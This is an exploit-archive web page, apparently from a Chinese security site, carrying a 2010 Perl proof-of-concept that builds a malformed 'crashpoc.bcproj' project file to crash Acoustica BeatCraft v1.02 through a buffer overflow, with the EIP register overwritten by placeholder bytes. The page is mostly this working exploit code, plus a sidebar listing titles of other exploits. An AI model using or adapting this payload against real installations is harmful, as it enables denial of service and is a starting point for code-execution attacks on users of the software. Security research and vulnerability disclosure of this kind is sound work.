首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Acoustica BeatCraft v1.02 Build 19 Local DoS Crash PoC
来源:anastasiosm[at]gmail[dot]com 作者:Monachos 发布时间:2010-10-13  
#Download: http://www.acoustica.com/beatcraft/download.htm
#Tested on Windows XP Pro SP2 (050301-1519)
#Author: Anastasios Monachos (secuid0) - anastasiosm[at]gmail[dot]com
#Greetz: inj3ct0r and offsec teams
#!/usr/bin/perl

my $header = "\x52\x49\x46\x46\x30\x79\x02\x00\x62\x65\x61\x74".
  "\x62\x70\x72\x6f\x30\x02\x00\x00\xcd\xcc\x8c\x3f".
  "\x43\x3a\x5c\x41\x2e\x62\x63\x70\x72\x6f\x6a";

my $junk ="\x50"x499;
my $eip ="\x41"x4;
my $junk2="\x59"x42;

open (myfile, '>crashpoc.bcproj');
binmode(myfile);
print myfile $header.$junk.$eip.$junk2;
close (myfile);
print "\t\t\tCrash file has been created - crashpoc.bcproj\n";


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Disk Pulse Server v2.2.34 Remo
·Oracle Java 6 OBJECT tag "laun
·AdaptCMS 2.0.1 Beta Release Re
·Firefox 3.5.10 & 3.6.6 WMP Mem
·Oracle Java APPLET Tag Childre
·Max Anket v1.0 - Multiple Remo
·Oracle Virtual Server Agent Co
·Postcard Mentor - Database Dis
·Oracle Solaris CVE-2010-3503 '
·sakkis digital postcards 1.0 b
·Multiple Buffer Overflows in W
·nutscards (ing) Database Discl
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved